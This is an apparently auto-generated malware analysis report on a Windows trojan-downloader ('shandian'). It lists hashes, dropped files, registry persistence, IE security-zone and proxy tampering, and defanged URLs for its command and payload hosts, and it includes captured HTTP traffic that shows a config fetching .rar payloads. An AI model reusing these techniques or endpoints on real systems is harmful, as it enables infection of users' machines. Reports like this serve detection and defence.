Trojan-Downloader.Win32.Genome.gxgz_d617df9b1a

by malwarelabrobot on May 25th, 2014 in Malware Descriptions.

Trojan-Downloader.Win32.Genome.gxgz (Kaspersky), Trojan.Win32.Generic!BT (VIPRE), Trojan.StartPage.63860 (DrWeb), Artemis!D617DF9B1ABB (McAfee), Downloader.Generic13.CDXI (AVG), Win32:Malware-gen (Avast), mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan-Downloader, Trojan

The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Summary

Dynamic Analysis

Static Analysis

Network Activity

Map

Strings from Dumps

Removals

MD5: d617df9b1abb7d2bfe3e3cd00d6b7210
SHA1: c4e7e201287bd853f36bf963efcd6047f3c3cf68
SHA256: 538902107cc76f9ff23b813383701ad352bac8499cbf8609123ccb4d36b06121
SSDeep: 24576:jaRGmay4PjE9bUix084d2mVWca83VSQCbLL0mAS7:aGfjkoPwx8cHbLImAS7
Size: 1083210 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: MiniApp
Created at: 2009-06-07 00:41:59
Analyzed on: WindowsXP SP3 32-bit

Summary:

Trojan-Downloader. Trojan program, which downloads files from the Internet without user's notice and executes them.

Payload

No specific payload has been found.

Process activity

The Trojan-Downloader creates the following process(es):

shandian.exe:3748

The Trojan-Downloader injects its code into the following process(es):

%original file name%.exe:2196
shandian.exe:3776
sdad.exe:3824

File activity

The process %original file name%.exe:2196 makes changes in the file system.
The Trojan-Downloader creates and/or writes to the following file(s):

%Program Files%\shandian\ico\360.ico (32 bytes)
%Documents and Settings%\%current user%\Desktop\Internet Explorer.lnk (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx2.tmp\bind.dll (2530 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OVYHJBCC\stat[1].htm (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx2.tmp\xID.dll (10 bytes)
%Program Files%\shandian\bin\shandian.exe (28283 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx2.tmp\config0.ini (3 bytes)
%Program Files%\shandian\ico\ie.ico (700 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx2.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Desktop\Ãƒâ€°ÃƒÂÃ‚ÂµÃƒÂ§ÃƒÂ¤Ã‚Â¯Ãƒâ‚¬Ãƒâ‚¬Ãƒâ€ ÃƒÂ·.lnk (505 bytes)
%Program Files%\shandian\config.ini (194 bytes)
%Program Files%\shandian\bin\shandian.ini (74 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx2.tmp\config.ini (4 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\Quick Launch\Ãƒâ€°ÃƒÂÃ‚ÂµÃƒÂ§ÃƒÂ¤Ã‚Â¯Ãƒâ‚¬Ãƒâ‚¬Ãƒâ€ ÃƒÂ·.lnk (700 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx2.tmp\Md5dll.dll (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Program Files%\shandian\ico\anquan.ico (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OVYHJBCC\desktop.ini (67 bytes)
%Program Files%\shandian\ico\taobao.ico (15 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\Ãƒâ€°ÃƒÂÃ‚ÂµÃƒÂ§ÃƒÂ¤Ã‚Â¯Ãƒâ‚¬Ãƒâ‚¬Ãƒâ€ ÃƒÂ·\Ãƒâ€°ÃƒÂÃ‚ÂµÃƒÂ§ÃƒÂ¤Ã‚Â¯Ãƒâ‚¬Ãƒâ‚¬Ãƒâ€ ÃƒÂ·.lnk (694 bytes)
%Program Files%\shandian\bin\sdad.exe (12955 bytes)
%Program Files%\shandian\shandian.exe (3124 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\Ãƒâ€°ÃƒÂÃ‚ÂµÃƒÂ§ÃƒÂ¤Ã‚Â¯Ãƒâ‚¬Ãƒâ‚¬Ãƒâ€ ÃƒÂ·\ÃƒÂÃ‚Â¶Ãƒâ€ÃƒËœÃƒâ€°ÃƒÂÃ‚ÂµÃƒÂ§ÃƒÂ¤Ã‚Â¯Ãƒâ‚¬Ãƒâ‚¬Ãƒâ€ ÃƒÂ·.lnk (507 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SZIS9VJF\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Desktop\360Ã‚Â°Ã‚Â²ÃƒË†Ã‚Â«ÃƒÂ¤Ã‚Â¯Ãƒâ‚¬Ãƒâ‚¬Ãƒâ€ ÃƒÂ·.lnk (1 bytes)

The Trojan-Downloader deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsx2.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OVYHJBCC\stat[1].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss1.tmp (0 bytes)

The process shandian.exe:3776 makes changes in the file system.
The Trojan-Downloader creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\3F9KLW6F\desktop.ini (67 bytes)
%Program Files%\shandian\bin\twcache.ini (1392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\3F9KLW6F\123_sogou_com[1].txt (15406 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1GGYBZUQ\welcome_cn[1].htm (1469 bytes)
%Program Files%\shandian\bin\shandian.ini.tmp (244 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1GGYBZUQ\desktop.ini (67 bytes)
%Program Files%\shandian\bin\theworld.ac (196 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\3F9KLW6F\newioage[1].css (715 bytes)

The Trojan-Downloader deletes the following file(s):

%Program Files%\shandian\bin\shandian.ini (0 bytes)

The process shandian.exe:3748 makes changes in the file system.
The Trojan-Downloader deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\~DFA0E0.tmp (0 bytes)

The process sdad.exe:3824 makes changes in the file system.
The Trojan-Downloader creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Cookies\6JFOCE1Z.txt (86 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1GGYBZUQ\cpv1[1].htm (1117 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OVYHJBCC\miniindex[1].htm (3605 bytes)
%Program Files%\shandian\bin\update\PopWinParam.xml (196 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SZIS9VJF\jquery-1.7.2.min[1].js (46418 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OVYHJBCC\cpc_img[1].htm (442 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SZIS9VJF\tj[1].js (279 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SZIS9VJF\stylemini[1].css (4241 bytes)

Registry activity

The process %original file name%.exe:2196 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{fdd9f6f3-7454-11e2-b4cd-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Ãƒâ€°ÃƒÂÃ‚ÂµÃƒÂ§ÃƒÂ¤Ã‚Â¯Ãƒâ‚¬Ãƒâ‚¬Ãƒâ€ ÃƒÂ·]
"DisplayName" = "Ãƒâ€°ÃƒÂÃ‚ÂµÃƒÂ§ÃƒÂ¤Ã‚Â¯Ãƒâ‚¬Ãƒâ‚¬Ãƒâ€ ÃƒÂ·"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Ãƒâ€°ÃƒÂÃ‚ÂµÃƒÂ§ÃƒÂ¤Ã‚Â¯Ãƒâ‚¬Ãƒâ‚¬Ãƒâ€ ÃƒÂ·]
"Publisher" = "Ãƒâ€°ÃƒÂÃ‚ÂµÃƒÂ§"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Ãƒâ€°ÃƒÂÃ‚ÂµÃƒÂ§ÃƒÂ¤Ã‚Â¯Ãƒâ‚¬Ãƒâ‚¬Ãƒâ€ ÃƒÂ·]
"URLInfoAbout" = "http://www.sd.com"
"DisplayIcon" = "%Program Files%\shandian\shandian.exe"

"UninstallString" = "%Program Files%\shandian\uninst.exe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{fdd9f6f2-7454-11e2-b4cd-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 41 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Ãƒâ€°ÃƒÂÃ‚ÂµÃƒÂ§ÃƒÂ¤Ã‚Â¯Ãƒâ‚¬Ãƒâ‚¬Ãƒâ€ ÃƒÂ·]
"DisplayVersion" = "1.0.0.0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8E 38 76 CD 22 EF A2 ED 55 FD 91 76 56 F8 0A 1F"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{773a730e-74fb-11e2-b597-000c293bdf2f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{fdd9f6f5-7454-11e2-b4cd-806d6172696f}]
"BaseClass" = "Drive"

The Trojan-Downloader modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan-Downloader modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

To automatically run itself each time Windows is booted, the Trojan-Downloader adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"shandian" = "%Program Files%\shandian\shandian.exe"

The Trojan-Downloader modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan-Downloader deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process shandian.exe:3776 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Internet Explorer\International\CpMRU]
"Size" = "10"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{fdd9f6f3-7454-11e2-b4cd-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKCU\Software\Microsoft\Internet Explorer\International\CpMRU]
"InitHits" = "100"

[HKCU\Software\Microsoft\Internet Explorer\International]
"W2KLpk" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Internet Explorer\International\CpMRU]
"Enable" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKCU\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BLOCK_LMZ_SCRIPT]
"shandian.exe" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_SCRIPTURL_MITIGATION]
"shandian.exe" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKCU\Software\Microsoft\Internet Explorer\International\CpMRU]
"Factor" = "20"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{fdd9f6f2-7454-11e2-b4cd-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_HTTP_USERNAME_PASSWORD_DISABLE]
"shandian.exe" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 45 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F7 1D 09 3C A6 24 2A 48 E8 13 1F FB 0B 91 69 E8"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{773a730e-74fb-11e2-b597-000c293bdf2f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{fdd9f6f5-7454-11e2-b4cd-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Favorites" = "%Documents and Settings%\%current user%\Favorites"

The Trojan-Downloader modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan-Downloader modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan-Downloader modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan-Downloader deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process shandian.exe:3748 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A8 46 AC 44 96 EE AC A1 19 93 B4 37 92 9C 6D D6"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 43 00 00 00 01 00 00 00 00 00 00 00"

The Trojan-Downloader modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass" = "1"

The Trojan-Downloader modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

"UNCAsIntranet" = "1"

The Trojan-Downloader modifies IE settings for security zones to map all urls to the Intranet Zone:

"IntranetName" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan-Downloader deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process sdad.exe:3824 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "59 C1 81 AD C4 80 A3 57 6C 97 05 55 C4 F6 67 80"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 47 00 00 00 01 00 00 00 00 00 00 00"

The Trojan-Downloader modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass" = "1"

The Trojan-Downloader modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

"UNCAsIntranet" = "1"

The Trojan-Downloader modifies IE settings for security zones to map all urls to the Intranet Zone:

"IntranetName" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan-Downloader deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

Dropped PE files

MD5	File path
a7d710e78711d5ab90e4792763241754	c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsx2.tmp\Md5dll.dll
00a0194c20ee912257df53bfe258ee4a	c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsx2.tmp\System.dll
b8172201dcaeed37f4e9135e4914f8a4	c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsx2.tmp\bind.dll
3a5ed71aa9c6846d95d57235c4c443d7	c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsx2.tmp\xID.dll
8f87437f10cd1ae1d2e8a16c74edb3bd	c:\Program Files\shandian\bin\sdad.exe
14748083682ed1f9ef1dc28bb609050a	c:\Program Files\shandian\bin\shandian.exe
7499652b9cad3205bd2b2eda2e21e3a9	c:\Program Files\shandian\shandian.exe

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

No information is available.

PE Sections

Name	Virtual Address	Virtual Size	Raw Size	Entropy	Section MD5
.text	4096	23628	24064	4.46394	856b32eb77dfd6fb67f21d6543272da5
.rdata	28672	4764	5120	3.4982	dc77f8a1e6985a4361c55642680ddb4f
.data	36864	154712	1024	3.3278	7922d4ce117d7d5b3ac2cffe4b0b5e4f
.ndata	192512	45056	0	0	d41d8cd98f00b204e9800998ecf8427e
.rsrc	237568	21744	22016	2.05069	c4abc83e4bd8c1fcd28895598e95a3c5

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL	IP
hxxp://stat.fjmjm.com/stat/?v=1&ac=setup&name=%original file name%.exe&mac=00-0C-29-3B-DF-2F&md5=cd1bf5c8668f31abd345f75407391ed8	112.124.102.171
hxxp://stat.fjmjm.com/stat/?ac=stat&name=%original file name%.exe&mac=00-0C-29-3B-DF-2F&md5=cd1bf5c8668f31abd345f75407391ed8	112.124.102.171
hxxp://stat.fjmjm.com/	112.124.102.171
hxxp://stat.fjmjm.com/web/welcome_cn.htm?ver=2.4.1.9&guid=a24a7d04104ebf0095dce7c62dcb34c065ffccc6f6834a08ba51a487958340021400889203&lastver=	112.124.102.171
hxxp://proxy.sogou.com/?22014
hxxp://stat.fjmjm.com/web/newioage.css	112.124.102.171
hxxp://stat.fjmjm.com/web/PopWinParam.asp?d=2014419&mainver=1.0.0&popver=1.0.0&xmlver=20131020010000	112.124.102.171
hxxp://stat.fjmjm.com/miniindex/	112.124.102.171
hxxp://stat.fjmjm.com/miniindex/inc/stylemini.css	112.124.102.171
hxxp://stat.fjmjm.com/miniindex/inc/jquery-1.7.2.min.js	112.124.102.171
hxxp://stat.fjmjm.com/miniindex/tj.js	112.124.102.171
hxxp://www.fjmjm.com/web/welcome_cn.htm?ver=2.4.1.9&guid=a24a7d04104ebf0095dce7c62dcb34c065ffccc6f6834a08ba51a487958340021400889203&lastver=	112.124.102.171
hxxp://www.jlbnh.com/	112.124.102.171
hxxp://www.mdtxw.org/miniindex/inc/stylemini.css	112.124.102.171
hxxp://www.mdtxw.org/miniindex/inc/jquery-1.7.2.min.js	112.124.102.171
hxxp://123.sogou.com/?22014	106.120.151.65
hxxp://www.mdtxw.org/miniindex/tj.js	112.124.102.171
hxxp://www.mdtxw.org/miniindex/	112.124.102.171
hxxp://www.fjmjm.com/web/newioage.css	112.124.102.171
down.jsrjrc.org	222.186.60.2

IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET POLICY HTTP Request on Unusual Port Possibly Hostile

Traffic

GET /miniindex/inc/jquery-1.7.2.min.js HTTP/1.1

Accept: */*

Referer: hXXp://VVV.mdtxw.org/miniindex/

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C; .NET4.0E)

Host: VVV.mdtxw.org

Connection: Keep-Alive


HTTP/1.1 200 OK

Content-Length: 91342

Content-Type: application/x-javascript

Last-Modified: Thu, 10 Apr 2014 16:44:10 GMT

Accept-Ranges: bytes

ETag: "069a418dc54cf1:3b8"

Server: Microsoft-IIS/6.0

Who: ShanIE

Date: Sat, 24 May 2014 04:46:08 GMT
/*!. * jQuery JavaScript Library v1.6.1. * hXXp://jquery.com/. *. * Co
pyright 2011, John Resig. * Dual licensed under the MIT or GPL Version
 2 licenses.. * hXXp://jquery.org/license. *. * Includes Sizzle.js. * 
hXXp://sizzlejs.com/. * Copyright 2011, The Dojo Foundation. * Release
d under the MIT, BSD, and GPL Licenses.. *. * Date: Thu May 12 15:04:3
6 2011 -0400. */.(function(a,b){function cy(a){return f.isWindow(a)?a:
a.nodeType===9?a.defaultView||a.parentWindow:!1}function cv(a){if(!cj[
a]){var b=f("<" a ">").appendTo("body"),d=b.css("display");b.rem
ove();if(d==="none"||d===""){ck||(ck=c.createElement("iframe"),ck.fram
eBorder=ck.width=ck.height=0),c.body.appendChild(ck);if(!cl||!ck.creat
eElement)cl=(ck.contentWindow||ck.contentDocument).document,cl.write("
<!doctype><html><body></body></html>");b
=cl.createElement(a),cl.body.appendChild(b),d=f.css(b,"display"),c.bod
y.removeChild(ck)}cj[a]=d}return cj[a]}function cu(a,b){var c={};f.eac
h(cp.concat.apply([],cp.slice(0,b)),function(){c[this]=a});return c}fu
nction ct(){cq=b}function cs(){setTimeout(ct,0);return cq=f.now()}func
tion ci(){try{return new a.ActiveXObject("Microsoft.XMLHTTP")}catch(b)
{}}function ch(){try{return new a.XMLHttpRequest}catch(b){}}function c
b(a,c){a.dataFilter&&(c=a.dataFilter(c,a.dataType));var d=a.dataTypes,
e={},g,h,i=d.length,j,k=d[0],l,m,n,o,p;for(g=1;g<i;g  ){if(g===1)fo
r(h in a.converters)typeof h=="string"&&(e[h.toLowerCase()]=a.converte
rs[h]);l=k,k=d[g];if(k==="*")k=l;else if(l!=="*"&&l!==k){m=l " " k<<< skipped >>>

GET /stat/?v=1&ac=setup&name=%original file name%.exe&mac=00-0C-29-3B-DF-2F&md5=cd1bf5c8668f31abd345f75407391ed8 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36

Host: stat.fjmjm.com

Cache-Control: no-cache


HTTP/1.1 200 OK

Date: Sat, 24 May 2014 04:45:38 GMT

Server: Microsoft-IIS/6.0

Who: ShanIE

Content-Length: 4514

Content-Type: text/html

Set-Cookie: ASPSESSIONIDAQRTSTST=KNJENNHDONBIEPLGNFNANOJL; path=/

Cache-control: private
..[ShortCut_1]..Desc=360............Hint=360............Name=360......
......URL=hXXp://VVV.jlbnh.com..Icon=ico\360.ico..[ShortCut_2]..Desc=I
nternet Explorer..Hint=Internet Explorer..Name=Internet Explorer..URL=
hXXp://VVV.jlbnh.com..Icon=ico\ie.ico..[SoftWare_1]..Desc=..........Hi
nt=..........Name=F30241_s_0523..URL=hXXp://down.jsrjrc.org:99/F30241_
s_0523.rar..reg=HKLM\SOFTWARE\Baidu\BaiduSd\InstallDir..[SoftWare_2]..
Desc=..........Hint=..........Name=cgqhlv_70690..URL=hXXp://down.jsrjr
c.org:99/cgqhlv_70690.rar..reg=HKLM\SOFTWARE\Baidu\BaiduAn\InstallDir.
.[SoftWare_3]..Desc=..........Hint=..........Name=KXWebBox_3409_RBF..U
RL=hXXp://down.jsrjrc.org:99/KXWebBox_3409_RBF.rar..reg=HKLM\SOFTWARE\
Microsoft\Windows\CurrentVersion\App Paths\XXGameBox.exe\..[SoftWare_4
]..Desc=..........Hint=..........Name=pczh_98_2..URL=hXXp://down.jsrjr
c.org:99/pczh_98_2.rar..reg=HKLM\SOFTWARE\Microsoft\Windows\CurrentVer
sion\App Paths\Ainqngz3.9.exe\..[SoftWare_5]..Desc=......Hint=......Na
me=kuping_b_54282..URL=hXXp://down.jsrjrc.org:99/kuping_b_54282.rar..r
eg=HKCU\Software\Kuping\InstallPath..[SoftWare_6]..Desc=..............
Hint=..............Name=qiqibox_1016..URL=hXXp://down.jsrjrc.org:99/qi
qibox_1016.rar..reg=HKLM\SOFTWARE\qi..

GET /miniindex/inc/stylemini.css HTTP/1.1

Accept: */*

Referer: hXXp://VVV.mdtxw.org/miniindex/

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C; .NET4.0E)

Host: VVV.mdtxw.org

Connection: Keep-Alive


HTTP/1.1 200 OK

Content-Length: 11323

Content-Type: text/css

Last-Modified: Thu, 10 Apr 2014 18:35:54 GMT

Accept-Ranges: bytes

ETag: "0a189b4eb54cf1:3b8"

Server: Microsoft-IIS/6.0

Who: ShanIE

Date: Sat, 24 May 2014 04:46:08 GMT
img{border:0}..#mini_wrap .bor_n {...border: 0px currentColor;..}..#mi
ni_wrap .none {...display: none;..}..#mini_wrap {.....}..#closehBtn {.
